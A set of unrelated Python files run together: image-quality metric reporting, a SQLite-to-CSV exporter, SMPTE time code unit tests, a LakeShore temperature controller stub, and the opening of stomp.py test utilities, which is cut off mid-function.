print('ssim_G2_x_std: %f\n' % ssim_G2_x_std)
print('psnr_G2_x_mean: %f\n' % psnr_G2_x_mean)
print('psnr_G2_x_std: %f\n' % psnr_G2_x_std)
print('L1_G2_x_mean: %f\n' % L1_G2_x_mean)
print('L1_G2_x_std: %f\n' % L1_G2_x_std)
print('L2_G2_x_mean: %f\n' % L2_G2_x_mean)
print('L2_G2_x_std: %f\n' % L2_G2_x_std)
##################### Inception score ##################
G1_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G1_list[i]) for i in range(len(G1_list))]
G2_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G2_list[i]) for i in range(len(G2_list))]
# IS_G1_mean, IS_G1_std = tflib.inception_score.get_inception_score(G1_list)
IS_G1_mean, IS_G1_std = tflib.inception_score.get_inception_score(G1_list_masked)
print('IS_G1_mean: %f\n' % IS_G1_mean)
print('IS_G1_std: %f\n' % IS_G1_std)
# IS_G2_mean, IS_G2_std = tflib.inception_score.get_inception_score(G2_list)
IS_G2_mean, IS_G2_std = tflib.inception_score.get_inception_score(G2_list_masked)
print('IS_G2_mean: %f\n' % IS_G2_mean)
print('IS_G2_std: %f\n' % IS_G2_std)
with open(score_path, 'w') as f:
f.write('N: %d ' % N)
f.write('ssimG1: %.5f +- %.5f ' % (ssim_G1_x_mean, ssim_G1_x_std))
f.write('ISG1: %.5f +- %.5f ' % (IS_G1_mean, IS_G1_std))
f.write('psnrG1: %.5f +- %.5f ' % (psnr_G1_x_mean, psnr_G1_x_std))
f.write('L1G1: %.5f +- %.5f ' % (L1_G1_x_mean, L1_G1_x_std))
f.write('L2G1: %.5f +- %.5f ' % (L2_G1_x_mean, L2_G1_x_std))
f.write('ssimG2: %.5f +- %.5f ' % (ssim_G2_x_mean, ssim_G2_x_std))
f.write('ISG2: %.5f +- %.5f ' % (IS_G2_mean, IS_G2_std))
f.write('psnrG2: %.5f +- %.5f ' % (psnr_G2_x_mean, psnr_G2_x_std))
f.write('L1G2: %.5f +- %.5f ' % (L1_G2_x_mean, L1_G2_x_std))
f.write('L2G2: %.5f +- %.5f' % (L2_G2_x_mean, L2_G2_x_std))
# f.write('ssim_std: %f ' % ssim_G_x_std)
# f.write('IS_mean: %f ' % IS_G_mean)
# f.write('IS_std: %f ' % IS_G_std)
# f.write('psnr_mean: %f ' % psnr_G_x_mean)
# f.write('psnr_std: %f' % psnr_G_x_std)
|
""""
Copyright 2010 Shahriyar Amini
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sqlite3
import commands
import sys
from time import strftime
# accepts an opened sqlite connection cursor
def getTableNames(c):
tableNames = []
statement = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"
c.execute(statement)
for row in c:
tableNames.append(row[0])
return tableNames
def getColumns(c, table):
columns = []
statement = "PRAGMA table_info(%s);" %table
c.execute(statement)
for row in c:
columns.append(row[1])
return columns
inputDB = sys.argv[1]
conn = sqlite3.connect(inputDB)
c = conn.cursor()
dbName = inputDB.rstrip('.db')
ts = strftime("%m%d%Y_%H%M")
# get all the tables
tables = getTableNames(c)
for table in tables:
outputFileName = "%s_%s_%s.csv" %(dbName, table, ts)
f = open(outputFileName,'w')
# write the column header
columns = getColumns(c, table)
writeString = ''
for column in columns:
writeString = writeString + str(column) + ','
writeString = writeString.rstrip(',')
writeString = writeString + '\n'
f.write(writeString)
# get the tables entries
c.execute('select * from %s;' %table)
entryCount = 0
for row in c:
entryCount = entryCount + 1
writeString = ''
for i in range(0,len(row)):
writeString = writeString + str(row[i]) + ','
writeString = writeString.rstrip(',')
f.write(writeString + '\n')
print writeString
print 'Number of entries: ' + str(entryCount)
f.close()
c.close()
conn.close()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2020, Sandflow Consulting LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for the SMPTE Time Codes"""
# pylint: disable=R0201,C0115,C0116,W0212
from fractions import Fraction
import unittest
from ttconv.time_code import SmpteTimeCode, FPS_29_97, FPS_30
class SmpteTimeCodesTest(unittest.TestCase):
def test_parse_non_drop_frame_time_code(self):
time_code = SmpteTimeCode.parse("01:02:03:04", FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111694, time_code.to_frames())
self.assertAlmostEqual(3723.133, time_code.to_seconds(), delta=0.001)
self.assertEqual("01:02:03:04", str(time_code))
def test_parse_drop_frame_time_code(self):
time_code = SmpteTimeCode.parse("01:02:03;04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01;02;03;04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01:02:03;04", FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01:02:03.04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01.02.03.04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
def test_time_code_frames_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_30)
self.assertEqual("00:00:59:25", str(time_code))
self.assertEqual(1795, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1796, FPS_30)
self.assertEqual("00:00:59:26", str(time_code))
self.assertEqual(1796, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1797, FPS_30)
self.assertEqual("00:00:59:27", str(time_code))
self.assertEqual(1797, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1798, FPS_30)
self.assertEqual("00:00:59:28", str(time_code))
self.assertEqual(1798, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1799, FPS_30)
self.assertEqual("00:00:59:29", str(time_code))
self.assertEqual(1799, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1800, FPS_30)
self.assertEqual("00:01:00:00", str(time_code))
self.assertEqual(1800, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1801, FPS_30)
self.assertEqual("00:01:00:01", str(time_code))
self.assertEqual(1801, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1802, FPS_30)
self.assertEqual("00:01:00:02", str(time_code))
self.assertEqual(1802, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1803, FPS_30)
self.assertEqual("00:01:00:03", str(time_code))
self.assertEqual(1803, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1804, FPS_30)
self.assertEqual("00:01:00:04", str(time_code))
self.assertEqual(1804, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1805, FPS_30)
self.assertEqual("00:01:00:05", str(time_code))
self.assertEqual(1805, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17977, FPS_30)
self.assertEqual("00:09:59:07", str(time_code))
self.assertEqual(17977, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17978, FPS_30)
self.assertEqual("00:09:59:08", str(time_code))
self.assertEqual(17978, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17979, FPS_30)
self.assertEqual("00:09:59:09", str(time_code))
self.assertEqual(17979, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17980, FPS_30)
self.assertEqual("00:09:59:10", str(time_code))
self.assertEqual(17980, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17981, FPS_30)
self.assertEqual("00:09:59:11", str(time_code))
self.assertEqual(17981, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17982, FPS_30)
self.assertEqual("00:09:59:12", str(time_code))
self.assertEqual(17982, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17983, FPS_30)
self.assertEqual("00:09:59:13", str(time_code))
self.assertEqual(17983, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17984, FPS_30)
self.assertEqual("00:09:59:14", str(time_code))
self.assertEqual(17984, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17985, FPS_30)
self.assertEqual("00:09:59:15", str(time_code))
self.assertEqual(17985, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17986, FPS_30)
self.assertEqual("00:09:59:16", str(time_code))
self.assertEqual(17986, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17987, FPS_30)
self.assertEqual("00:09:59:17", str(time_code))
self.assertEqual(17987, time_code.to_frames())
def test_drop_frame_time_code_frames_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_29_97)
self.assertEqual("00:00:59;25", str(time_code))
self.assertEqual(1795, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1796, FPS_29_97)
self.assertEqual("00:00:59;26", str(time_code))
self.assertEqual(1796, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1797, FPS_29_97)
self.assertEqual("00:00:59;27", str(time_code))
self.assertEqual(1797, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1798, FPS_29_97)
self.assertEqual("00:00:59;28", str(time_code))
self.assertEqual(1798, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1799, FPS_29_97)
self.assertEqual("00:00:59;29", str(time_code))
self.assertEqual(1799, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1800, FPS_29_97)
self.assertEqual("00:01:00;02", str(time_code))
self.assertEqual(1800, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1801, FPS_29_97)
self.assertEqual("00:01:00;03", str(time_code))
self.assertEqual(1801, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1802, FPS_29_97)
self.assertEqual("00:01:00;04", str(time_code))
self.assertEqual(1802, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1803, FPS_29_97)
self.assertEqual("00:01:00;05", str(time_code))
self.assertEqual(1803, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1804, FPS_29_97)
self.assertEqual("00:01:00;06", str(time_code))
self.assertEqual(1804, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1805, FPS_29_97)
self.assertEqual("00:01:00;07", str(time_code))
self.assertEqual(1805, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17977, FPS_29_97)
self.assertEqual("00:09:59;25", str(time_code))
self.assertEqual(17977, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17978, FPS_29_97)
self.assertEqual("00:09:59;26", str(time_code))
self.assertEqual(17978, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17979, FPS_29_97)
self.assertEqual("00:09:59;27", str(time_code))
self.assertEqual(17979, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17980, FPS_29_97)
self.assertEqual("00:09:59;28", str(time_code))
self.assertEqual(17980, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17981, FPS_29_97)
self.assertEqual("00:09:59;29", str(time_code))
self.assertEqual(17981, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17982, FPS_29_97)
self.assertEqual("00:10:00;00", str(time_code))
self.assertEqual(17982, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17983, FPS_29_97)
self.assertEqual("00:10:00;01", str(time_code))
self.assertEqual(17983, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17984, FPS_29_97)
self.assertEqual("00:10:00;02", str(time_code))
self.assertEqual(17984, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17985, FPS_29_97)
self.assertEqual("00:10:00;03", str(time_code))
self.assertEqual(17985, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17986, FPS_29_97)
self.assertEqual("00:10:00;04", str(time_code))
self.assertEqual(17986, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17987, FPS_29_97)
self.assertEqual("00:10:00;05", str(time_code))
self.assertEqual(17987, time_code.to_frames())
def test_time_code_seconds_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_30)
self.assertEqual("00:00:59:25", str(time_code))
self.assertAlmostEqual(59.833, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1796, FPS_30)
self.assertEqual("00:00:59:26", str(time_code))
self.assertAlmostEqual(59.866, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1797, FPS_30)
self.assertEqual("00:00:59:27", str(time_code))
self.assertAlmostEqual(59.9, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1798, FPS_30)
self.assertEqual("00:00:59:28", str(time_code))
self.assertAlmostEqual(59.933, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1799, FPS_30)
self.assertEqual("00:00:59:29", str(time_code))
self.assertAlmostEqual(59.966, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1800, FPS_30)
self.assertEqual("00:01:00:00", str(time_code))
self.assertAlmostEqual(60.0, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1801, FPS_30)
self.assertEqual("00:01:00:01", str(time_code))
self.assertAlmostEqual(60.033, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1802, FPS_30)
self.assertEqual("00:01:00:02", str(time_code))
self.assertAlmostEqual(60.066, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1803, FPS_30)
self.assertEqual("00:01:00:03", str(time_code))
self.assertAlmostEqual(60.1, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1804, FPS_30)
self.assertEqual("00:01:00:04", str(time_code))
self.assertAlmostEqual(60.133, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1805, FPS_30)
self.assertEqual("00:01:00:05", str(time_code))
self.assertAlmostEqual(60.166, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17977, FPS_30)
self.assertEqual("00:09:59:07", str(time_code))
self.assertAlmostEqual(599.233, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17978, FPS_30)
self.assertEqual("00:09:59:08", str(time_code))
self.assertAlmostEqual(599.266, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17979, FPS_30)
self.assertEqual("00:09:59:09", str(time_code))
self.assertAlmostEqual(599.3, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17980, FPS_30)
self.assertEqual("00:09:59:10", str(time_code))
self.assertAlmostEqual(599.333, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17981, FPS_30)
self.assertEqual("00:09:59:11", str(time_code))
self.assertAlmostEqual(599.366, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17982, FPS_30)
self.assertEqual("00:09:59:12", str(time_code))
self.assertAlmostEqual(599.4, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17983, FPS_30)
self.assertEqual("00:09:59:13", str(time_code))
self.assertAlmostEqual(599.433, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17984, FPS_30)
self.assertEqual("00:09:59:14", str(time_code))
self.assertAlmostEqual(599.466, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17985, FPS_30)
self.assertEqual("00:09:59:15", str(time_code))
self.assertAlmostEqual(599.5, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17986, FPS_30)
self.assertEqual("00:09:59:16", str(time_code))
self.assertAlmostEqual(599.533, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17987, FPS_30)
self.assertEqual("00:09:59:17", str(time_code))
self.assertAlmostEqual(599.566, time_code.to_seconds(), delta=0.001)
def test_drop_frame_time_code_seconds_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_29_97)
self.assertEqual("00:00:59;25", str(time_code))
self.assertAlmostEqual(59.893, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1796, FPS_29_97)
self.assertEqual("00:00:59;26", str(time_code))
self.assertAlmostEqual(59.926, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1797, FPS_29_97)
self.assertEqual("00:00:59;27", str(time_code))
self.assertAlmostEqual(59.959, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1798, FPS_29_97)
self.assertEqual("00:00:59;28", str(time_code))
self.assertAlmostEqual(59.993, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1799, FPS_29_97)
self.assertEqual("00:00:59;29", str(time_code))
self.assertAlmostEqual(60.026, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1800, FPS_29_97)
self.assertEqual("00:01:00;02", str(time_code))
self.assertAlmostEqual(60.06, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1801, FPS_29_97)
self.assertEqual("00:01:00;03", str(time_code))
self.assertAlmostEqual(60.093, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1802, FPS_29_97)
self.assertEqual("00:01:00;04", str(time_code))
self.assertAlmostEqual(60.126, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1803, FPS_29_97)
self.assertEqual("00:01:00;05", str(time_code))
self.assertAlmostEqual(60.160, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1804, FPS_29_97)
self.assertEqual("00:01:00;06", str(time_code))
self.assertAlmostEqual(60.193, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1805, FPS_29_97)
self.assertEqual("00:01:00;07", str(time_code))
self.assertAlmostEqual(60.226, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17977, FPS_29_97)
self.assertEqual("00:09:59;25", str(time_code))
self.assertAlmostEqual(599.832, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17978, FPS_29_97)
self.assertEqual("00:09:59;26", str(time_code))
self.assertAlmostEqual(599.865, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17979, FPS_29_97)
self.assertEqual("00:09:59;27", str(time_code))
self.assertAlmostEqual(599.899, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17980, FPS_29_97)
self.assertEqual("00:09:59;28", str(time_code))
self.assertAlmostEqual(599.932, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17981, FPS_29_97)
self.assertEqual("00:09:59;29", str(time_code))
self.assertAlmostEqual(599.966, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17982, FPS_29_97)
self.assertEqual("00:10:00;00", str(time_code))
self.assertAlmostEqual(599.999, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17983, FPS_29_97)
self.assertEqual("00:10:00;01", str(time_code))
self.assertAlmostEqual(600.032, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17984, FPS_29_97)
self.assertEqual("00:10:00;02", str(time_code))
self.assertAlmostEqual(600.066, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17985, FPS_29_97)
self.assertEqual("00:10:00;03", str(time_code))
self.assertAlmostEqual(600.099, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17986, FPS_29_97)
self.assertEqual("00:10:00;04", str(time_code))
self.assertAlmostEqual(600.132, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17987, FPS_29_97)
self.assertEqual("00:10:00;05", str(time_code))
self.assertAlmostEqual(600.166, time_code.to_seconds(), delta=0.001)
def test_from_frames(self):
time_code = SmpteTimeCode.from_frames(111694, FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111694, time_code.to_frames())
self.assertEqual("01:02:03:04", str(time_code))
time_code = SmpteTimeCode.from_frames(111582, FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual("01:02:03;04", str(time_code))
def test_add_frames(self):
time_code = SmpteTimeCode.parse("01:02:03:04", FPS_30)
time_code.add_frames(30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(4, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111724, time_code.to_frames())
self.assertEqual(Fraction(111724, 30), time_code.to_temporal_offset())
self.assertEqual("01:02:04:04", str(time_code))
time_code = SmpteTimeCode.parse("00:00:59;29", FPS_29_97)
time_code.add_frames()
self.assertEqual(0, time_code.get_hours())
self.assertEqual(1, time_code.get_minutes())
self.assertEqual(0, time_code.get_seconds())
self.assertEqual(2, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(1_800, time_code.to_frames())
self.assertEqual(Fraction(1800, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("00:01:00;02", str(time_code))
time_code = SmpteTimeCode.parse("00:19:59;29", FPS_29_97)
time_code.add_frames()
self.assertEqual(0, time_code.get_hours())
self.assertEqual(20, time_code.get_minutes())
self.assertEqual(0, time_code.get_seconds())
self.assertEqual(0, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(35_964, time_code.to_frames())
self.assertEqual(Fraction(35964, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("00:20:00;00", str(time_code))
if __name__ == '__main__':
unittest.main()
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from pychron.hardware.lakeshore.base_controller import BaseLakeShoreController
class Model331TemperatureController(BaseLakeShoreController):
pass
# ============= EOF =============================================
|
try:
from configparser import RawConfigParser
except ImportError:
from ConfigParser import RawConfigParser
import logging
import os
import re
import socket
import threading
from stomp.backward import *
log = logging.getLogger('testutils.py')
config = RawConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'setup.ini'))
header_re = re.compile(r'[^:]+:.*')
if sys.hexversion >= 0x03000000: # Python 3+
from stomp.test.p3testutils import *
else: # Python 2
from stomp.test.p2testutils import *
def get_environ(name):
try:
return os.environ[name]
except:
return None
def get_default_host():
host = config.get('default', 'host')
port = config.get('default', 'port')
return [(get_environ('STD_HOST') or host, int(get_environ('STD_PORT') or port))]
def get_default_vhost():
try:
vhost = config.get('default', 'vhost')
except:
vhost = None
return get_environ('STD_VHOST') or vhost
def get_default_user():
user = config.get('default', 'user')
return get_environ('STD_USER') or user
def get_default_password():
password = config.get('default', 'password')
return get_environ('STD_PASSWORD') or password
def get_ipv6_host():
host = config.get('ipv6', 'host')
port = config.get('ipv6', 'port')
return [(get_environ('IPV6_HOST') or host, int(get_environ('IPV6_PORT') or port))]
def get_default_ssl_host():
host = config.get('default', 'host')
port = config.get('default', 'ssl_port')
return [(get_environ('STD_HOST') or host, int(get_environ('STD_SSL_PORT') or port))]
def get_sni_ssl_host():
host = config.get('sni', 'host')
port = config.get('sni', 'ssl_port')
return [(get_environ('SNI_HOST') or host, int(get_environ('SNI_SSL_PORT') or port))]
def get_rabbitmq_host():
host = config.get('rabbitmq', 'host')
port = config.get('rabbitmq', 'port')
return [(get_environ('RABBITMQ_HOST') or host, int(get_environ('RABBITMQ_PORT') or port))]
def get_rabbitmq_user():
user = config.get('rabbitmq', 'user')
return get_environ('RABBITMQ_USER') or user
def get_rabbitmq_password():
password = config.get('rabbitmq', 'password')
return get_environ('RABBITMQ_PASSWORD') or password
def get_stompserver_host():
host = config.get('stompserver', 'host')
port = config.get('stompserver', 'port')
return [(get_environ('STOMPSERVER_HOST') or host, int(get_environ('STOMPSERVER_PORT') or port))]
def get_apollo_host():
host = config.get('apollo', 'host')
port = config.get('apollo', 'port')
return [(get_environ('APOLLO_HOST') or host, int(get_environ('APOLLO_PORT') or port))]
class TestStompServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.frames = []
def start(self):
log.debug('Starting stomp server')
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind((self.host, self.port))
self.s.listen(1)
self.running = True
thread = threading.Thread(None, self.run)
thread.daemon = True
thread.start()
self.stopped = False
log.debug('Stomp server started')
def stop(self):
log.debug('Stopping test server')
if self.conn:
try:
self.conn.shutdown(socket.SHUT_WR)
except Exception:
pass
self.conn.close()
if self.s:
self.s.close()
self.running = False
self.conn = None
self.s = None
self.stopped = True
log.debug('Connection stopped')
def get_next_frame(self):
if len(self.frames) > 0:
rtn = self.frames[0]
del self.frames[0]
return rtn
else:
return ''
def add_frame(self, frame):
self.frames.append(frame)
def run(self):
self.conn, _ = self.s.accept()
while self.running:
try:
_ = self.conn.recv(1024)
frame = self.get_next_frame()
if self.conn is None:
break
if frame is not None:
self.conn.send(encode(frame))
except Exception:
_, e, _ = sys.exc_info()
log.debug(e)
break
try:
self.conn.close()
except:
pass
self.stopped = True
log.debug('Run loop completed')
class TestStdin(object):
pass
class TestStdout(object):
def __init__(self, test):
self.test = test
self.expects = []
def expect(self, txt):
self.expects.insert(0, re.compile(txt))
def write(self, txt):
txt = txt.rstrip()
if txt != '':
print(txt)
if txt == '>' or txt == '' or header_re.match(txt):
return
if len(self.expects) == 0:
